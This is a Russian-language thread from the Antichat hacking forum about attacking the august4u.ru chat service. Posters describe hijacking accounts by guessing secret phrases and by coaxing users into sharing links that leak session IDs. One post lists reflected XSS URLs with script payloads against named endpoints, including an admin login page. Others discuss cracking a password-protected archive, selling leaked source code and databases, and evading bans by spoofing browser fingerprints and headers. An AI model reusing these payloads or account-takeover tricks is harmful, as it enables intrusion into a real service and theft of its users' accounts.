Форум АНТИЧАТ - А есть чего-нить на чатах august4u.ru?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)

- - А есть чего-нить на чатах august4u.ru? (https://forum.antichat.xyz/showthread.php?t=11514)

А есть чего-нить на чатах august4u.ru?

Ребята помогите,не надо мне давать конкретно что делать просто скажите что тут возможно и объясните как сделать,пожалуйста помогите!!
Спасибо.
_http://russianchat.august4u.ru/

тебе сюды http://forum.antichat.ru/thread9471.html все уязвимости были написаны!!! и пока новых ненайдено как найдем так сообщим;)

вообщето что я описывал, часть уже залатали... ищемс новые...

Цитата:

Сообщение от tanzwut

вообщето что я описывал, часть уже залатали... ищемс новые...

если че найдешь отпишися очень интеренсо!! полюбому дырочки есть :d

спасибо челы =).

Цитата:

Сообщение от forever777

если че найдешь отпишися очень интеренсо!! полюбому дырочки есть :d

есть тут у меня идейка одна, ес получится всё, то напишу.. после сесии займусь...

Всем привет) заходил на форум только ради августовских чатов... общаюсь в них был админам одного;) не скрою узнал много интересного... но Дело по моему пишет только "tanzwut" тебе мужик отдельный респект!;)
По аугусту похоже только эта тема открыта осталась... хотелось бы немножко добавить от себя)
про пароли и секретные фразы.. пароли естесно меняют все.. а вот к секретным фразам относяца не так внимательно) анкет админов правда не забирал... но в некоторых чатах угнал много(только ради спортивного интереса;) и большенство по секретным фразам ака смена пароля) за частую это был или ник или имя)) еще насчет секретных враз.. тут в другом посте писали что: админ может востановить пароль по этой фразе.. но секретную фразу можно поменять вместе с паролем) про пароли вроди все сказал)
теперь собственно зачем заходил) ...
до сегодняшнего дня сессию и ид можно было узнать простым вопросом... типа: "слухай (по)друг(а) а дай ссылочку на творчество на первое произведение плиз))".. сам сегодня сидел под ником админа в одном чате... можно было делать всё.. кроме кила, удаления анкет и захода в админку(там похоже ип свиряица.. имхо) но тема прикрылась:(( теперь только сессию можно так узнать, еще ее можно узнать спросив ссылку на смайлы... и собственно цель моего визита)
если кто нить знает как узнать ид пользователя(собеседника) напишите пожалуйста в личку! буду очень признателен! за сим откланяюсь пожелав всем удачи и дольнейших поисков багов))))

Вобщем от делать нечего

_http://august4u.ru/creation/write.inc?id="><script>alert(/bla/);</script>

_http://august4u.ru/creation/write.inc?preview=1&Name=Admin%20%CB%CE%D5
_http://august4u.ru/creation/write.inc?preview=1&sessname="><script>alert(/bla/);</script>

_http://august4u.ru/creation/write.inc?AuthorProfile=1&sessname="><script>alert (/bla/);</script>
_http://august4u.ru/creation/write.inc?AuthorProfile=1&id="><script>alert(/bla/);</script>

_http://august4u.ru/admin/auth/auth.php?AuthTitle=<script>alert(/bla/);</script>
_http://august4u.ru/admin/auth/auth.php?AuthError=<script>alert(/bla/);</script>

:rolleyes:

Летс Гоу..........

Летс Гоу..........[/QUOTE]

сколько хочешь за исходники и БД?

кстати народ лазил по просторам яндекса наткнулся на сайт там продают скрипты чата августа просят 150$ но есть возможность скачать архивы запароленые.......чем можно подобрать пароль на МНОГОпоточный рар?????

что то не понял. какие архивы? откуда?

тыц
Ты в разделе "Чаты" устроил "покупка, продажа" и "Soft - *nix/windows"
Антошка2003
Он говорит что исходники можно скачать, только рар в котором они находятся защищен паролем и за пароль просят деньги, видимо так

по поводу продажы подробно тут - http://mini-rinok.ru/showthread.php?t=12

upd:
тоха стукни в асю, разговор есть...

Танзвут, превед

Цитата:

Сообщение от Антошка2003

что то не понял. какие архивы? откуда?

Че непонятного? есть два архива раровских запароленых внутри архива лежат какийта скрипты вот просят за них 150$

[QUOTE=Connor]тыц
Ты в разделе "Чаты" устроил "покупка, продажа" и "Soft - *nix/windows"
Антошка2003
Он говорит что исходники можно скачать, только рар в котором они находятся защищен паролем и за пароль просят деньги, видимо так[/QUOне че я не устраивал........я че продаю что то?

[QUOTE=TANZWUT]по поводу продажы подробно тут - http://mini-rinok.ru/showthread.php?t=12

Это ты продаеш за 300 а я знаю где за 150 :D .....=)

ну а то что ты продаешь реально как август и так же раздавать чаты? или просто один чат?

https://forum.antichat.ru/thread45723.html вот тут я выложил сорцы в паблик вчера.. так что те кто продаёт за 150 пусть обломяца ;)
я теперь продаю только расшифрованые скрипты и БД...

Предоставляю Вашему вниманию уникальный скрипт чата August4u.ru.
Хочу Вам сказать, что халявы Вы здесь не найдёте!
Скрипт платный!
Скрипт находится в архивах.
Архивы под паролем,разделены на 2 части.После оплаты вы получите пароль на почтовый ящик!
Инструкция по установке прилагается!

Скрипт чата August4u.ru <<<СКАЧАТЬ 1 часть>>>

Скрипт чата August4u.ru <<<СКАЧАТЬ 2 часть>>>

Оплату производите Любым способом в размере 150 wmz!

вот как расписано=) чем бы пасс подобрать и посмотреть че там внутри.........

скачай то что выложил Tanzwut и попроси у этих челов чтобы дали тебе название файлов, какие есть в архиве

вот этот сайт http://august4you.narod.ru/
но поговорить с владельцем мне что то так и не удалось

ничё удивительного ибо я думаю кидок... я когда продавал сорцы, делал чтоб было видно файлы в архиве (а то получается как кот в мешке..). и даже многотомный архив столько не может весить, уже попробовал упаковать нормальные сорцы с БД, размер ну никак неможет быть 2,28 МБ (2 400 000 байт) + 2,27 МБ (2 385 800 байт) всё это бы поместилось в 1 rar архив размером 1,87 МБ (1 963 496 байт) при среднем сжатии (размер незжатой папки 2,91 МБ (3 060 181 байт)).

а может там еще и БД??? ну я ему написал чтоб он название файлов скинул посмотрим че он расскажет=)

да и народ вызывает недоверие...

а как обойти бан ч атах августа?

меняй браузер/прокси/разрешение экрана/замена http заголовков.
чат определяет -

браузеры:
"Microsoft Internet Explorer", "Netscape Navigator", "Mozilla", "Opera", "Konqueror", "Galeon", "Phoenix", "Firebird", "Firefox", "Safari".

Ось:
"Windows 3.x", "Windows 95/98/NT", "Windows NT", "Windows NT 3.1", "Windows NT 3.5", "Windows NT 4.0", "Windows 95", "Windows 98", "Windows ME", "Windows 2000", "Windows XP", "Windows .NET", "Linux", "FreeBSD", "SunOS", "BeOS", "IRIX", "AIX", "HP-UX", "OS/2", "Mac OS X"

CPU:
"Intel x86", "PowerPC", "Motorola 680x0", "SGI MIPS", "PA-RISC", "Sun SPARC"

качество цветопередачи:
"black and white", "4 colors", "16 colors", "256 colors", "High Color (16 bit)", "True Color (24 bit)", "True Color (32 bit)"

тип соединения:
"Modem", "Local Area Network", "Offline"

так же проверяет заголовки:
REMOTE_ADDR;
HTTP_X_FORWARDED_FOR;
HTTP_X_FORWARDED;
HTTP_FORWARDED_FOR;
HTTP_FORWARDED;
HTTP_VIA;
HTTP_X_COMING_FROM;
HTTP_COMING_FROM;
HTTP_SERVER_VARS;
HTTP_ENV_VARS;

так же смотри в реестре:
"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\LastChecked", _rnd, "REG_DWORD"
"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\SoftwareId", cid.value, "REG_DWORD"

и определяет ID компа по этим ключам:

Код:

["{89820200-ECBD-11CF-8B85-00AA005B4383}",

"{08B0E5C0-4FCB-11CF-AAA5-00401C608555}",

"{5FD399C0-A70A-11D1-9948-00C04F98BBC9}",

"{DE5AED00-A4BF-11D1-9948-00C04F98BBC9}",

"{5A8D6EE0-3E18-11D0-821E-444553540000}",

"{45EA75A0-A269-11D1-B5BF-0000F8051515}",

"{0FDE1F56-0D59-4FD7-9624-E3DF6B419D0E}",

"{C9E9A340-D1F1-11D0-821E-444553540600}",

"{630B1DA0-B465-11D1-9948-00C04F98BBC9}",

"{08B0E5C0-4FCB-11CF-AAA5-00401C608500}",

"{89820200-ECBD-11CF-8B85-00AA005B4340}",

"{CC2A9BA0-3BDD-11D0-821E-444553540000}",

"{3AF36230-A269-11D1-B5BF-0000F8051515}",

"{4278C270-A269-11D1-B5BF-0000F8051515}",

"{4F216970-C90C-11D1-B5C7-0000F8051515}",

"{36F8EC70-C29A-11D1-B5C7-0000F8051515}",

"{9381D8F2-0288-11D0-9501-00AA00B911A5}",

"{44BBA848-CC51-11CF-AAFA-00AA00B6015C}",

"{44BBA842-CC51-11CF-AAFA-00AA00B6015B}",

"{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}",

"{44BBA840-CC51-11CF-AAFA-00AA00B6015C}",

"{4B4A3D7A-D586-11D2-AFD7-00A0C9C724D0}",

"{7790769C-0471-11D2-AF11-00C04FA35D02}",

"{9A2E4AB0-9A7E-11D2-9DA1-00C04F98BBC9}",

"{22D6F312-B0F6-11D0-94AB-0080C74C7E95}",

"{6BF52A52-394A-11d3-B153-00C04F79FAA6}",

"{283807B5-2C60-11D0-A31D-00AA00B92C03}",

"{10072CEC-8CC1-11D1-986E-00A0C955B42F}",

"{D27CDB6E-AE6D-11CF-96B8-444553540000}",

"{166B1BCA-3F9C-11CF-8075-444553540000}",

"{2A202491-F00D-11CF-87CC-0020AFEECF20}",

"{73FA19D0-2D75-11D2-995D-00C04F98BBC9}",

"{4F645220-306D-11D2-995D-00C04F98BBC9}",

"{23064720-C4F8-11D1-994D-00C04F98BBC9}",

"{11820EE0-B3C2-11D1-9948-00C04F98BBC9}",

"{44BBA855-CC51-11CF-AAFA-00AA00B6015F}",

"{E4066320-E4AE-11CF-B1B0-00AA00BBAD66}",

"{6FAB99D0-BAB8-11D1-994A-00C04F98BBC9}",

"{5945C046-1E7D-11D1-BC44-00C04FD912BE}",

"{44BBA844-CC51-11CF-AAFA-00AA00B6015C}",

"{B57EA2D1-1C31-11d2-B9C1-00A0C9B7C9C1}",

"{BEF6E001-A874-101A-8BBA-00AA00300CAB}",

"{90A7533D-88FE-11D0-9DBE-0000C0411FC3}",

"{18B6F603-BDC4-4EEE-9598-D2A4D1375605}",

"{47F67D00-9E55-11D1-BAEF-00C04FC2D130}",

"{6295DF27-35EE-11D1-8707-00C04FD93327}",

"{44BBA851-CC51-11CF-AAFA-00AA00B6015C}",

"{1CDEE860-E95B-11CF-B1B0-00AA00BBAD66}",

"{C9E9A340-D1F1-11D0-821E-444553540300}",

"{76C19B50-F0C8-11CF-87CC-0020AFEECF20}",

"{76C19B32-F0C8-11CF-87CC-0020AFEECF20}",

"{E92B03AB-B707-11D2-9CBD-0000F87A369E}",

"{135F09A5-168D-4718-A581-F5AC7377B48F}",

"{39109464-8F34-4DA7-9C90-11C7FB1CC446}",

"{8CFE0650-C7FF-48BA-8B48-0C43406250A7}",

"{FBC882CC-4650-4130-8C68-50A002EF584F}",

"{5E8BA27D-728C-4F43-A96A-7826FA5DDCE1}",

"{E5663173-8CEB-4A40-A9E2-BF67CD92511E}",

"{4374BA1E-743E-4716-95E7-0FF37D71A6B1}",

"{A954CDD5-A95F-414F-B3FE-FBEF9D2AECEA}",

"{9F2D298D-5E51-4EAF-BECE-AF18017ECB29}",

"{3CF2FCBF-A0FD-4563-8E7D-5E4BBD517722}",

"{90A2A715-D986-4EAB-8C73-4D06114EF760}",

"{21B0D83A-E28E-4298-9EBA-DEC032CC4B13}",

"{3BF42070-B3B1-11D1-B5C5-0000F8051515}"];